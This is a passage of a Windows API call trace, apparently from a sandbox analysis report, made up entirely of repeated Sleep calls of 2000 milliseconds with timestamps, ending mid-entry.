[0242.002] Sleep (dwMilliseconds=0x7d0) [0242.008] Sleep (dwMilliseconds=0x7d0) [0242.009] Sleep (dwMilliseconds=0x7d0) [0242.015] Sleep (dwMilliseconds=0x7d0) [0242.016] Sleep (dwMilliseconds=0x7d0) [0242.020] Sleep (dwMilliseconds=0x7d0) [0242.022] Sleep (dwMilliseconds=0x7d0) [0242.024] Sleep (dwMilliseconds=0x7d0) [0242.048] Sleep (dwMilliseconds=0x7d0) [0242.054] Sleep (dwMilliseconds=0x7d0) [0242.056] Sleep (dwMilliseconds=0x7d0) [0242.062] Sleep (dwMilliseconds=0x7d0) [0242.069] Sleep (dwMilliseconds=0x7d0) [0242.076] Sleep (dwMilliseconds=0x7d0) [0242.077] Sleep (dwMilliseconds=0x7d0) [0242.081] Sleep (dwMilliseconds=0x7d0) [0242.083] Sleep (dwMilliseconds=0x7d0) [0242.085] Sleep (dwMilliseconds=0x7d0) [0242.091] Sleep (dwMilliseconds=0x7d0) [0242.097] Sleep (dwMilliseconds=0x7d0) [0242.099] Sleep (dwMilliseconds=0x7d0) [0242.107] Sleep (dwMilliseconds=0x7d0) [0242.113] Sleep (dwMilliseconds=0x7d0) [0242.115] Sleep (dwMilliseconds=0x7d0) [0242.120] Sleep (dwMilliseconds=0x7d0) [0242.122] Sleep (dwMilliseconds=0x7d0) [0242.125] Sleep (dwMilliseconds=0x7d0) [0242.127] Sleep (dwMilliseconds=0x7d0) [0242.129] Sleep (dwMilliseconds=0x7d0) [0242.134] Sleep (dwMilliseconds=0x7d0) [0242.136] Sleep (dwMilliseconds=0x7d0) [0242.141] Sleep (dwMilliseconds=0x7d0) [0242.148] Sleep (dwMilliseconds=0x7d0) [0242.149] Sleep (dwMilliseconds=0x7d0) [0242.156] Sleep (dwMilliseconds=0x7d0) [0242.161] Sleep (dwMilliseconds=0x7d0) [0242.163] Sleep (dwMilliseconds=0x7d0) [0242.168] Sleep (dwMilliseconds=0x7d0) [0242.170] Sleep (dwMilliseconds=0x7d0) [0242.177] Sleep (dwMilliseconds=0x7d0) [0242.179] Sleep (dwMilliseconds=0x7d0) [0242.185] Sleep (dwMilliseconds=0x7d0) [0242.191] Sleep (dwMilliseconds=0x7d0) [0242.193] Sleep (dwMilliseconds=0x7d0) [0242.198] Sleep (dwMilliseconds=0x7d0) [0242.200] Sleep (dwMilliseconds=0x7d0) [0242.207] Sleep (dwMilliseconds=0x7d0) [0242.208] Sleep (dwMilliseconds=0x7d0) [0242.214] Sleep (dwMilliseconds=0x7d0) [0242.215] Sleep (dwMilliseconds=0x7d0) [0242.221] Sleep (dwMilliseconds=0x7d0) [0242.222] Sleep (dwMilliseconds=0x7d0) [0242.228] Sleep (dwMilliseconds=0x7d0) [0242.229] Sleep (dwMilliseconds=0x7d0) [0242.235] Sleep (dwMilliseconds=0x7d0) [0242.237] Sleep (dwMilliseconds=0x7d0) [0242.242] Sleep (dwMilliseconds=0x7d0) [0242.244] Sleep (dwMilliseconds=0x7d0) [0242.250] Sleep (dwMilliseconds=0x7d0) [0242.251] Sleep (dwMilliseconds=0x7d0) [0242.257] Sleep (dwMilliseconds=0x7d0) [0242.258] Sleep (dwMilliseconds=0x7d0) [0242.262] Sleep (dwMilliseconds=0x7d0) [0242.265] Sleep (dwMilliseconds=0x7d0) [0242.272] Sleep (dwMilliseconds=0x7d0) [0242.278] Sleep (dwMilliseconds=0x7d0) [0242.284] Sleep (dwMilliseconds=0x7d0) [0242.286] Sleep (dwMilliseconds=0x7d0) [0242.292] Sleep (dwMilliseconds=0x7d0) [0242.293] Sleep (dwMilliseconds=0x7d0) [0242.299] Sleep (dwMilliseconds=0x7d0) [0242.306] Sleep (dwMilliseconds=0x7d0) [0242.308] Sleep (dwMilliseconds=0x7d0) [0242.309] Sleep (dwMilliseconds=0x7d0) [0242.315] Sleep (dwMilliseconds=0x7d0) [0242.316] Sleep (dwMilliseconds=0x7d0) [0242.321] Sleep (dwMilliseconds=0x7d0) [0242.322] Sleep (dwMilliseconds=0x7d0) [0242.327] Sleep (dwMilliseconds=0x7d0) [0242.329] Sleep (dwMilliseconds=0x7d0) [0242.334] Sleep (dwMilliseconds=0x7d0) [0242.335] Sleep (dwMilliseconds=0x7d0) [0242.348] Sleep (dwMilliseconds=0x7d0) [0242.349] Sleep (dwMilliseconds=0x7d0) [0242.355] Sleep (dwMilliseconds=0x7d0) [0242.357] Sleep (dwMilliseconds=0x7d0) [0242.358] Sleep (dwMilliseconds=0x7d0) [0242.363] Sleep (dwMilliseconds=0x7d0) [0242.364] Sleep (dwMilliseconds=0x7d0) [0242.371] Sleep (dwMilliseconds=0x7d0) [0242.377] Sleep (dwMilliseconds=0x7d0) [0242.384] Sleep (dwMilliseconds=0x7d0) [0242.391] Sleep (dwMilliseconds=0x7d0) [0242.392] Sleep (dwMilliseconds=0x7d0) [0242.398] Sleep (dwMilliseconds=0x7d0) [0242.400] Sleep (dwMilliseconds=0x7d0) [0242.403] Sleep (dwMilliseconds=0x7d0) [0242.408] Sleep (dwMilliseconds=0x7d0) [0242.409] Sleep (dwMilliseconds=0x7d0) [0242.414] Sleep (dwMilliseconds=0x7d0) [0242.421] Sleep (dwMilliseconds=0x7d0) [0242.428] Sleep (dwMilliseconds=0x7d0) [0242.429] Sleep (dwMilliseconds=0x7d0) [0242.435] Sleep (dwMilliseconds=0x7d0) [0242.436] Sleep (dwMilliseconds=0x7d0) [0242.442] Sleep (dwMilliseconds=0x7d0) [0242.443] Sleep (dwMilliseconds=0x7d0) [0242.448] Sleep (dwMilliseconds=0x7d0) [0242.450] Sleep (dwMilliseconds=0x7d0) [0242.457] Sleep (dwMilliseconds=0x7d0) [0242.458] Sleep (dwMilliseconds=0x7d0) [0242.464] Sleep (dwMilliseconds=0x7d0) [0242.475] Sleep (dwMilliseconds=0x7d0) [0242.476] Sleep (dwMilliseconds=0x7d0) [0242.484] Sleep (dwMilliseconds=0x7d0) [0242.486] Sleep (dwMilliseconds=0x7d0) [0242.492] Sleep (dwMilliseconds=0x7d0) [0242.494] Sleep (dwMilliseconds=0x7d0) [0242.497] Sleep (dwMilliseconds=0x7d0) [0242.501] Sleep (dwMilliseconds=0x7d0) [0242.502] Sleep (dwMilliseconds=0x7d0) [0242.510] Sleep (dwMilliseconds=0x7d0) [0242.512] Sleep (dwMilliseconds=0x7d0) [0242.518] Sleep (dwMilliseconds=0x7d0) [0242.519] Sleep (dwMilliseconds=0x7d0) [0242.525] Sleep (dwMilliseconds=0x7d0) [0242.527] Sleep (dwMilliseconds=0x7d0) [0242.533] Sleep (dwMilliseconds=0x7d0) [0242.534] Sleep (dwMilliseconds=0x7d0) [0242.540] Sleep (dwMilliseconds=0x7d0) [0242.544] Sleep (dwMilliseconds=0x7d0) [0242.547] Sleep (dwMilliseconds=0x7d0) [0242.548] Sleep (dwMilliseconds=0x7d0) [0242.555] Sleep (dwMilliseconds=0x7d0) [0242.562] Sleep (dwMilliseconds=0x7d0) [0242.564] Sleep (dwMilliseconds=0x7d0) [0242.569] Sleep (dwMilliseconds=0x7d0) [0242.571] Sleep (dwMilliseconds=0x7d0) [0242.578] Sleep (dwMilliseconds=0x7d0) [0242.580] Sleep (dwMilliseconds=0x7d0) [0242.588] Sleep (dwMilliseconds=0x7d0) [0242.595] Sleep (dwMilliseconds=0x7d0) [0242.597] Sleep (dwMilliseconds=0x7d0) [0242.603] Sleep (dwMilliseconds=0x7d0) [0242.604] Sleep (dwMilliseconds=0x7d0) [0242.611] Sleep (dwMilliseconds=0x7d0) [0242.612] Sleep (dwMilliseconds=0x7d0) [0242.618] Sleep (dwMilliseconds=0x7d0) [0242.619] Sleep (dwMilliseconds=0x7d0) [0242.625] Sleep (dwMilliseconds=0x7d0) [0242.626] Sleep (dwMilliseconds=0x7d0) [0242.632] Sleep (dwMilliseconds=0x7d0) [0242.633] Sleep (dwMilliseconds=0x7d0) [0242.635] Sleep (dwMilliseconds=0x7d0) [0242.639] Sleep (dwMilliseconds=0x7d0) [0242.646] Sleep (dwMilliseconds=0x7d0) [0242.647] Sleep (dwMilliseconds=0x7d0) [0242.653] Sleep (dwMilliseconds=0x7d0) [0242.659] Sleep (dwMilliseconds=0x7d0) [0242.667] Sleep (dwMilliseconds=0x7d0) [0242.669] Sleep (dwMilliseconds=0x7d0) [0242.674] Sleep (dwMilliseconds=0x7d0) [0242.676] Sleep (dwMilliseconds=0x7d0) [0242.678] Sleep (dwMilliseconds=0x7d0) [0242.682] Sleep (dwMilliseconds=0x7d0) [0242.684] Sleep (dwMilliseconds=0x7d0) [0242.689] Sleep (dwMilliseconds=0x7d0) [0242.691] Sleep (dwMilliseconds=0x7d0) [0242.696] Sleep (dwMilliseconds=0x7d0) [0242.698] Sleep (dwMilliseconds=0x7d0) [0242.704] Sleep (dwMilliseconds=0x7d0) [0242.705] Sleep (dwMilliseconds=0x7d0) [0242.712] Sleep (dwMilliseconds=0x7d0) [0242.713] Sleep (dwMilliseconds=0x7d0) [0242.718] Sleep (dwMilliseconds=0x7d0) [0242.723] Sleep (dwMilliseconds=0x7d0) [0242.725] Sleep (dwMilliseconds=0x7d0) [0242.732] Sleep (dwMilliseconds=0x7d0) [0242.740] Sleep (dwMilliseconds=0x7d0) [0242.748] Sleep (dwMilliseconds=0x7d0) [0242.757] Sleep (dwMilliseconds=0x7d0) [0242.765] Sleep (dwMilliseconds=0x7d0) [0242.767] Sleep (dwMilliseconds=0x7d0) [0242.768] Sleep (dwMilliseconds=0x7d0) [0242.776] Sleep (dwMilliseconds=0x7d0) [0242.777] Sleep (dwMilliseconds=0x7d0) [0242.787] Sleep (dwMilliseconds=0x7d0) [0242.788] Sleep (dwMilliseconds=0x7d0) [0242.796] Sleep (dwMilliseconds=0x7d0) [0242.798] Sleep (dwMilliseconds=0x7d0) [0242.806] Sleep (dwMilliseconds=0x7d0) [0242.808] Sleep (dwMilliseconds=0x7d0) [0242.812] Sleep (dwMilliseconds=0x7d0) [0242.817] Sleep (dwMilliseconds=0x7d0) [0242.818] Sleep (dwMilliseconds=0x7d0) [0242.826] Sleep (dwMilliseconds=0x7d0) [0242.828] Sleep (dwMilliseconds=0x7d0) [0242.835] Sleep (dwMilliseconds=0x7d0) [0242.844] Sleep (dwMilliseconds=0x7d0) [0242.852] Sleep (dwMilliseconds=0x7d0) [0242.854] Sleep (dwMilliseconds=0x7d0) [0242.857] Sleep (dwMilliseconds=0x7d0) [0242.862] Sleep (dwMilliseconds=0x7d0) [0242.863] Sleep (dwMilliseconds=0x7d0) [0242.871] Sleep (dwMilliseconds=0x7d0) [0242.880] Sleep (dwMilliseconds=0x7d0) [0242.890] Sleep (dwMilliseconds=0x7d0) [0242.891] Sleep (dwMilliseconds=0x7d0) [0242.898] Sleep (dwMilliseconds=0x7d0) [0242.900] Sleep (dwMilliseconds=0x7d0) [0242.910] Sleep (dwMilliseconds=0x7d0) [0242.913] Sleep (dwMilliseconds=0x7d0) [0242.921] Sleep (dwMilliseconds=0x7d0) [0242.922] Sleep (dwMilliseconds=0x7d0) [0242.930] Sleep (dwMilliseconds=0x7d0) [0242.939] Sleep (dwMilliseconds=0x7d0) [0242.941] Sleep (dwMilliseconds=0x7d0) [0242.946] Sleep (dwMilliseconds=0x7d0) [0242.949] Sleep (dwMilliseconds=0x7d0) [0242.950] Sleep (dwMilliseconds=0x7d0) [0242.959] Sleep (dwMilliseconds=0x7d0) [0242.960] Sleep (dwMilliseconds=0x7d0) [0242.968] Sleep (dwMilliseconds=0x7d0) [0242.969] Sleep (dwMilliseconds=0x7d0) [0242.978] Sleep (dwMilliseconds=0x7d0) [0242.979] Sleep (dwMilliseconds=0x7d0) [0242.988] Sleep (dwMilliseconds=0x7d0) [0242.992] Sleep (dwMilliseconds=0x7d0) [0242.998] Sleep (dwMilliseconds=0x7d0) [0243.009] Sleep (dwMilliseconds=0x7d0) [0243.010] Sleep (dwMilliseconds=0x7d0) [0243.020] Sleep (dwMilliseconds=0x7d0) [0243.049] Sleep (dwMilliseconds=0x7d0) [0243.050] Sleep (dwMilliseconds=0x7d0) [0243.058] Sleep (dwMilliseconds=0x7d0) [0243.059] Sleep (dwMilliseconds=0x7d0) [0243.068] Sleep (dwMilliseconds=0x7d0) [0243.069] Sleep (dwMilliseconds=0x7d0) [0243.077] Sleep (dwMilliseconds=0x7d0) [0243.087] Sleep (dwMilliseconds=0x7d0) [0243.096] Sleep (dwMilliseconds=0x7d0) [0243.101] Sleep (dwMilliseconds=0x7d0) [0243.105] Sleep (dwMilliseconds=0x7d0) [0243.106] Sleep (dwMilliseconds=0x7d0) [0243.115] Sleep (dwMilliseconds=0x7d0) [0243.123] Sleep (dwMilliseconds=0x7d0) [0243.132] Sleep (dwMilliseconds=0x7d0) [0243.133] Sleep (dwMilliseconds=0x7d0) [0243.141] Sleep (dwMilliseconds=0x7d0) [0243.145] Sleep (dwMilliseconds=0x7d0) [0243.150] Sleep (dwMilliseconds=0x7d0) [0243.152] Sleep (dwMilliseconds=0x7d0) [0243.160] Sleep (dwMilliseconds=0x7d0) [0243.161] Sleep (dwMilliseconds=0x7d0) [0243.169] Sleep (dwMilliseconds=0x7d0) [0243.177] Sleep (dwMilliseconds=0x7d0) [0243.186] Sleep (dwMilliseconds=0x7d0) [0243.188] Sleep (dwMilliseconds=0x7d0) [0243.189] Sleep (dwMilliseconds=0x7d0) [0243.196] Sleep (dwMilliseconds=0x7d0) [0243.205] Sleep (dwMilliseconds=0x7d0) [0243.215] Sleep (dwMilliseconds=0x7d0) [0243.223] Sleep (dwMilliseconds=0x7d0) [0243.224] Sleep (dwMilliseconds=0x7d0) [0243.231] Sleep (dwMilliseconds=0x7d0) [0243.232] Sleep (dwMilliseconds=0x7d0) [0243.234] Sleep (dwMilliseconds=0x7d0) [0243.243] Sleep (dwMilliseconds=0x7d0) [0243.245] Sleep (dwMilliseconds=0x7d0) [0243.253] Sleep (dwMilliseconds=0x7d0) [0243.254] Sleep (dwMilliseconds=0x7d0) [0243.262] Sleep (dwMilliseconds=0x7d0) [0243.263] Sleep (dwMilliseconds=0x7d0) [0243.272] Sleep (dwMilliseconds=0x7d0) [0243.273] Sleep (dwMilliseconds=0x7d0) [0243.277] Sleep (dwMilliseconds=0x7d0) [0243.282] Sleep (dwMilliseconds=0x7d0) [0243.283] Sleep (dwMilliseconds=0x7d0) [0243.292] Sleep (dwMilliseconds=0x7d0) [0243.293] Sleep (dwMilliseconds=0x7d0) [0243.303] Sleep (dwMilliseconds=0x7d0) [0243.311] Sleep (dwMilliseconds=0x7d0) [0243.312] Sleep (dwMilliseconds=0x7d0) [0243.321] Sleep (dwMilliseconds=0x7d0) [0243.328] Sleep (dwMilliseconds=0x7d0) [0243.337] Sleep (dwMilliseconds=0x7d0) [0243.339] Sleep (dwMilliseconds=0x7d0) [0243.356] Sleep (dwMilliseconds=0x7d0) [0243.366] Sleep (dwMilliseconds=0x7d0) [0243.369] Sleep (dwMilliseconds=0x7d0) [0243.376] Sleep (dwMilliseconds=0x7d0) [0243.378] Sleep (dwMilliseconds=0x7d0) [0243.380] Sleep (dwMilliseconds=0x7d0) [0243.388] Sleep (dwMilliseconds=0x7d0) [0243.389] Sleep (dwMilliseconds=0x7d0) [0243.398] Sleep (dwMilliseconds=0x7d0) [0243.399] Sleep (dwMilliseconds=0x7d0) [0243.407] Sleep (dwMilliseconds=0x7d0) [0243.408] Sleep (dwMilliseconds=0x7d0) [0243.418] Sleep (dwMilliseconds=0x7d0) [0243.421] Sleep (dwMilliseconds=0x7d0) [0243.427] Sleep (dwMilliseconds=0x7d0) [0243.436] Sleep (dwMilliseconds=0x7d0) [0243.437] Sleep (dwMilliseconds=0x7d0) [0243.444] Sleep (dwMilliseconds=0x7d0) [0243.453] Sleep (dwMilliseconds=0x7d0) [0243.461] Sleep (dwMilliseconds=0x7d0) [0243.462] Sleep (dwMilliseconds=0x7d0) [0243.465] Sleep (dwMilliseconds=0x7d0) [0243.470] Sleep (dwMilliseconds=0x7d0) [0243.472] Sleep (dwMilliseconds=0x7d0) [0243.479] Sleep (dwMilliseconds=0x7d0) [0243.489] Sleep (dwMilliseconds=0x7d0) [0243.499] Sleep (dwMilliseconds=0x7d0) [0243.500] Sleep (dwMilliseconds=0x7d0) [0243.509] Sleep (dwMilliseconds=0x7d0) [0243.519] Sleep (dwMilliseconds=0x7d0) [0243.529] Sleep (dwMilliseconds=0x7d0) [0243.542] Sleep (dwMilliseconds=0x7d0) [0243.552] Sleep (dwMilliseconds=0x7d0) [0243.556] Sleep (dwMilliseconds=0x7d0) [0243.561] Sleep (dwMilliseconds=0x7d0) [0243.562] Sleep (dwMilliseconds=0x7d0) [0243.571] Sleep (dwMilliseconds=0x7d0) [0243.580] Sleep (dwMilliseconds=0x7d0) [0243.590] Sleep (dwMilliseconds=0x7d0) [0243.598] Sleep (dwMilliseconds=0x7d0) [0243.599] Sleep (dwMilliseconds=0x7d0) [0243.607] Sleep (dwMilliseconds=0x7d0) [0243.616] Sleep (dwMilliseconds=0x7d0) [0243.626] Sleep (dwMilliseconds=0x7d0) [0243.634] Sleep (dwMilliseconds=0x7d0) [0243.641] Sleep (dwMilliseconds=0x7d0) [0243.645] Sleep (dwMilliseconds=0x7d0) [0243.707] Sleep (dwMilliseconds=0x7d0) [0243.711] Sleep (dwMilliseconds=0x7d0) [0243.719] Sleep (dwMilliseconds=0x7d0) [0243.729] Sleep (dwMilliseconds=0x7d0) [0243.730] Sleep (dwMilliseconds=0x7d0) [0243.738] Sleep (dwMilliseconds=0x7d0) [0243.742] Sleep (dwMilliseconds=0x7d0) [0243.749] Sleep (dwMilliseconds=0x7d0) [0243.750] Sleep (dwMilliseconds=0x7d0) [0243.757] Sleep (dwMilliseconds=0x7d0) [0243.766] Sleep (dwMilliseconds=0x7d0) [0243.767] Sleep (dwMilliseconds=0x7d0) [0243.774] Sleep (dwMilliseconds=0x7d0) [0243.775] Sleep (dwMilliseconds=0x7d0) [0243.781] Sleep (dwMilliseconds=0x7d0) [0243.782] Sleep (dwMilliseconds=0x7d0) [0243.786] Sleep (dwMilliseconds=0x7d0) [0243.788] Sleep (dwMilliseconds=0x7d0) [0243.790] Sleep (dwMilliseconds=0x7d0) [0243.795] Sleep (dwMilliseconds=0x7d0) [0243.796] Sleep (dwMilliseconds=0x7d0) [0243.802] Sleep (dwMilliseconds=0x7d0) [0243.804] Sleep (dwMilliseconds=0x7d0) [0243.810] Sleep (dwMilliseconds=0x7d0) [0243.816] Sleep (dwMilliseconds=0x7d0) [0243.818] Sleep (dwMilliseconds=0x7d0) [0243.824] Sleep (dwMilliseconds=0x7d0) [0243.826] Sleep (dwMilliseconds=0x7d0) [0243.832] Sleep (dwMilliseconds=0x7d0) [0243.835] Sleep (dwMilliseconds=0x7d0) [0243.836] Sleep (dwMilliseconds=0x7d0) [0243.841] Sleep (dwMilliseconds=0x7d0) [0243.847] Sleep (dwMilliseconds=0x7d0) [0243.848] Sleep (dwMilliseconds=0x7d0) [0243.854] Sleep (dwMilliseconds=0x7d0) [0243.855] Sleep (dwMilliseconds=0x7d0) [0243.861] Sleep (dwMilliseconds=0x7d0) [0243.870] Sleep (dwMilliseconds=0x7d0) [0243.871] Sleep (dwMilliseconds=0x7d0) [0243.876] Sleep (dwMilliseconds=0x7d0) [0243.878] Sleep (dwMilliseconds=0x7d0) [0243.882] Sleep (dwMilliseconds=0x7d0) [0243.884] Sleep (dwMilliseconds=0x7d0) [0243.885] Sleep (dwMilliseconds=0x7d0) [0243.892] Sleep (dwMilliseconds=0x7d0) [0243.893] Sleep (dwMilliseconds=0x7d0) [0243.898] Sleep (dwMilliseconds=0x7d0) [0243.902] Sleep (dwMilliseconds=0x7d0) [0243.910] Sleep (dwMilliseconds=0x7d0) [0243.912] Sleep (dwMilliseconds=0x7d0) [0243.918] Sleep (dwMilliseconds=0x7d0) [0243.919] Sleep (dwMilliseconds=0x7d0) [0243.926] Sleep (dwMilliseconds=0x7d0) [0243.932] Sleep (dwMilliseconds=0x7d0) [0243.939] Sleep (dwMilliseconds=0x7d0) [0243.940] Sleep (dwMilliseconds=0x7d0) [0243.947] Sleep (dwMilliseconds=0x7d0) [0243.948] Sleep (dwMilliseconds=0x7d0) [0243.955] Sleep (dwMilliseconds=0x7d0) [0243.956] Sleep (dwMilliseconds=0x7d0) [0243.962] Sleep (dwMilliseconds=0x7d0) [0243.963] Sleep (dwMilliseconds=0x7d0) [0243.968] Sleep (dwMilliseconds=0x7d0) [0243.970] Sleep (dwMilliseconds=0x7d0) [0243.976] Sleep (dwMilliseconds=0x7d0) [0243.977] Sleep (dwMilliseconds=0x7d0) [0243.982] Sleep (dwMilliseconds=0x7d0) [0243.988] Sleep (dwMilliseconds=0x7d0) [0243.990] Sleep (dwMilliseconds=0x7d0) [0243.995] Sleep (dwMilliseconds=0x7d0) [0244.002] Sleep (dwMilliseconds=0x7d0) [0244.003] Sleep (dwMilliseconds=0x7d0) [0244.008] Sleep (dwMilliseconds=0x7d0) [0244.009] Sleep (dwMilliseconds=0x7d0) [0244.019] Sleep (dwMilliseconds=0x7d0) [0244.022] Sleep (dwMilliseconds=0x7d0) [0244.044] Sleep (dwMilliseconds=0x7d0) [0244.046] Sleep (dwMilliseconds=0x7d0) [0244.052] Sleep (dwMilliseconds=0x7d0) [0244.053] Sleep (dwMilliseconds=0x7d0) [0244.059] Sleep (dwMilliseconds=0x7d0) [0244.061] Sleep (dwMilliseconds=0x7d0) [0244.066] Sleep (dwMilliseconds=0x7d0) [0244.068] Sleep (dwMilliseconds=0x7d0) [0244.076] Sleep (dwMilliseconds=0x7d0) [0244.082] Sleep (dwMilliseconds=0x7d0) [0244.083] Sleep (dwMilliseconds=0x7d0) [0244.085] Sleep (dwMilliseconds=0x7d0) [0244.090] Sleep (dwMilliseconds=0x7d0) [0244.092] Sleep (dwMilliseconds=0x7d0) [0244.098] Sleep (dwMilliseconds=0x7d0) [0244.100] Sleep (dwMilliseconds=0x7d0) [0244.106] Sleep (dwMilliseconds=0x7d0) [0244.108] Sleep (dwMilliseconds=0x7d0) [0244.113] Sleep (dwMilliseconds=0x7d0) [0244.115] Sleep (dwMilliseconds=0x7d0) [0244.120] Sleep (dwMilliseconds=0x7d0) [0244.121] Sleep (dwMilliseconds=0x7d0) [0244.126] Sleep (dwMilliseconds=0x7d0) [0244.128] Sleep (dwMilliseconds=0x7d0) [0244.129] Sleep (dwMilliseconds=0x7d0) [0244.135] Sleep (dwMilliseconds=0x7d0) [0244.141] Sleep (dwMilliseconds=0x7d0) [0244.142] Sleep (dwMilliseconds=0x7d0) [0244.147] Sleep (dwMilliseconds=0x7d0) [0244.153] Sleep (dwMilliseconds=0x7d0) [0244.154] Sleep (dwMilliseconds=0x7d0) [0244.159] Sleep (dwMilliseconds=0x7d0) [0244.161] Sleep (dwMilliseconds=0x7d0) [0244.166] Sleep (dwMilliseconds=0x7d0) [0244.171] Sleep (dwMilliseconds=0x7d0) [0244.173] Sleep (dwMilliseconds=0x7d0) [0244.174] Sleep (dwMilliseconds=0x7d0) [0244.179] Sleep (dwMilliseconds=0x7d0) [0244.181] Sleep (dwMilliseconds=0x7d0) [0244.187] Sleep (dwMilliseconds=0x7d0) [0244.193] Sleep (dwMilliseconds=0x7d0) [0244.194] Sleep (dwMilliseconds=0x7d0) [0244.199] Sleep (dwMilliseconds=0x7d0) [0244.201] Sleep (dwMilliseconds=0x7d0) [0244.206] Sleep (dwMilliseconds=0x7d0) [0244.208] Sleep (dwMilliseconds=0x7d0) [0244.213] Sleep (dwMilliseconds=0x7d0) [0244.217] Sleep (dwMilliseconds=0x7d0) [0244.220] Sleep (dwMilliseconds=0x7d0) [0244.221] Sleep (dwMilliseconds=0x7d0) [0244.228] Sleep (dwMilliseconds=0x7d0) [0244.234] Sleep (dwMilliseconds=0x7d0) [0244.235] Sleep (dwMilliseconds=0x7d0) [0244.240] Sleep (dwMilliseconds=0x7d0) [0244.242] Sleep (dwMilliseconds=0x7d0) [0244.247] Sleep (dwMilliseconds=0x7d0) [0244.248] Sleep (dwMilliseconds=0x7d0) [0244.254] Sleep (dwMilliseconds=0x7d0) [0244.256] Sleep (dwMilliseconds=0x7d0) [0244.260] Sleep (dwMilliseconds=0x7d0) [0244.262] Sleep (dwMilliseconds=0x7d0) [0244.266] Sleep (dwMilliseconds=0x7d0) [0244.268] Sleep (dwMilliseconds=0x7d0) [0244.273] Sleep (dwMilliseconds=0x7d0) [0244.274] Sleep (dwMilliseconds=0x7d0) [0244.279] Sleep (dwMilliseconds=0x7d0) [0244.280] Sleep (dwMilliseconds=0x7d0) [0244.286] Sleep (dwMilliseconds=0x7d0) [0244.287] Sleep (dwMilliseconds=0x7d0) [0244.292] Sleep (dwMilliseconds=0x7d0) [0244.293] Sleep (dwMilliseconds=0x7d0) [0244.299] Sleep (dwMilliseconds=0x7d0) [0244.300] Sleep (dwMilliseconds=0x7d0) [0244.317] Sleep (dwMilliseconds=0x7d0) [0244.319] Sleep (dwMilliseconds=0x7d0) [0244.325] Sleep (dwMilliseconds=0x7d0) [0244.326] Sleep (dwMilliseconds=0x7d0) [0244.333] Sleep (dwMilliseconds=0x7d0) [0244.334] Sleep (dwMilliseconds=0x7d0) [0244.346] Sleep (dwMilliseconds=0x7d0) [0244.354] Sleep (dwMilliseconds=0x7d0) [0244.355] Sleep (dwMilliseconds=0x7d0) [0244.360] Sleep (dwMilliseconds=0x7d0) [0244.361] Sleep (dwMilliseconds=0x7d0) [0244.367] Sleep (dwMilliseconds=0x7d0) [0244.368] Sleep (dwMilliseconds=0x7d0) [0244.370] Sleep (dwMilliseconds=0x7d0) [0244.374] Sleep (dwMilliseconds=0x7d0) [0244.381] Sleep (dwMilliseconds=0x7d0) [0244.382] Sleep (dwMilliseconds=0x7d0) [0244.388] Sleep (dwMilliseconds=0x7d0) [0244.389] Sleep (dwMilliseconds=0x7d0) [0244.394] Sleep (dwMilliseconds=0x7d0) [0244.395] Sleep (dwMilliseconds=0x7d0) [0244.400] Sleep (dwMilliseconds=0x7d0) [0244.402] Sleep (dwMilliseconds=0x7d0) [0244.407] Sleep (dwMilliseconds=0x7d0) [0244.408] Sleep (dwMilliseconds=0x7d0) [0244.414] Sleep (dwMilliseconds=0x7d0) [0244.416] Sleep (dwMilliseconds=0x7d0) [0244.417] Sleep (dwMilliseconds=0x7d0) [0244.421] Sleep (dwMilliseconds=0x7d0) [0244.422] Sleep (dwMilliseconds=0x7d0) [0244.428] Sleep (dwMilliseconds=0x7d0) [0244.433] Sleep (dwMilliseconds=0x7d0) [0244.439] Sleep (dwMilliseconds=0x7d0) [0244.441] Sleep (dwMilliseconds=0x7d0) [0244.445] Sleep (dwMilliseconds=0x7d0) [0244.446] Sleep (dwMilliseconds=0x7d0) [0244.452] Sleep (dwMilliseconds=0x7d0) [0244.453] Sleep (dwMilliseconds=0x7d0) [0244.459] Sleep (dwMilliseconds=0x7d0) [0244.460] Sleep (dwMilliseconds=0x7d0) [0244.462] Sleep (dwMilliseconds=0x7d0) [0244.465] Sleep (dwMilliseconds=0x7d0) [0244.466] Sleep (dwMilliseconds=0x7d0) [0244.472] Sleep (dwMilliseconds=0x7d0) [0244.473] Sleep (dwMilliseconds=0x7d0) [0244.478] Sleep (dwMilliseconds=0x7d0) [0244.479] Sleep (dwMilliseconds=0x7d0) [0244.488] Sleep (dwMilliseconds=0x7d0) [0244.489] Sleep (dwMilliseconds=0x7d0) [0244.494] Sleep (dwMilliseconds=0x7d0) [0244.496] Sleep (dwMilliseconds=0x7d0) [0244.501] Sleep (dwMilliseconds=0x7d0) [0244.507] Sleep (dwMilliseconds=0x7d0) [0244.508] Sleep (dwMilliseconds=0x7d0) [0244.510] Sleep (dwMilliseconds=0x7d0) [0244.513] Sleep (dwMilliseconds=0x7d0) [0244.520] Sleep (dwMilliseconds=0x7d0) [0244.521] Sleep (dwMilliseconds=0x7d0) [0244.526] Sleep (dwMilliseconds=0x7d0) [0244.533] Sleep (dwMilliseconds=0x7d0) [0244.535] Sleep (dwMilliseconds=0x7d0) [0244.540] Sleep (dwMilliseconds=0x7d0) [0244.546] Sleep (dwMilliseconds=0x7d0) [0244.547] Sleep (dwMilliseconds=0x7d0) [0244.552] Sleep (dwMilliseconds=0x7d0) [0244.553] Sleep (dwMilliseconds=0x7d0) [0244.555] Sleep (dwMilliseconds=0x7d0) [0244.560] Sleep (dwMilliseconds=0x7d0) [0244.561] Sleep (dwMilliseconds=0x7d0) [0244.567] Sleep (dwMilliseconds=0x7d0) [0244.568] Sleep (dwMilliseconds=0x7d0) [0244.573] Sleep (dwMilliseconds=0x7d0) [0244.575] Sleep (dwMilliseconds=0x7d0) [0244.580] Sleep (dwMilliseconds=0x7d0) [0244.586] Sleep (dwMilliseconds=0x7d0) [0244.587] Sleep (dwMilliseconds=0x7d0) [0244.595] Sleep (dwMilliseconds=0x7d0) [0244.596] Sleep (dwMilliseconds=0x7d0) [0244.602] Sleep (dwMilliseconds=0x7d0) [0244.603] Sleep (dwMilliseconds=0x7d0) [0244.609] Sleep (dwMilliseconds=0x7d0) [0244.610] Sleep (dwMilliseconds=0x7d0) [0244.616] Sleep (dwMilliseconds=0x7d0) [0244.622] Sleep (dwMilliseconds=0x7d0) [0244.623] Sleep (dwMilliseconds=0x7d0) [0244.629] Sleep (dwMilliseconds=0x7d0) [0244.635] Sleep (dwMilliseconds=0x7d0) [0244.642] Sleep (dwMilliseconds=0x7d0) [0244.643] Sleep (dwMilliseconds=0x7d0) [0244.648] Sleep (dwMilliseconds=0x7d0) [0244.649] Sleep (dwMilliseconds=0x7d0) [0244.656] Sleep (dwMilliseconds=0x7d0) [0244.658] Sleep (dwMilliseconds=0x7d0) [0244.663] Sleep 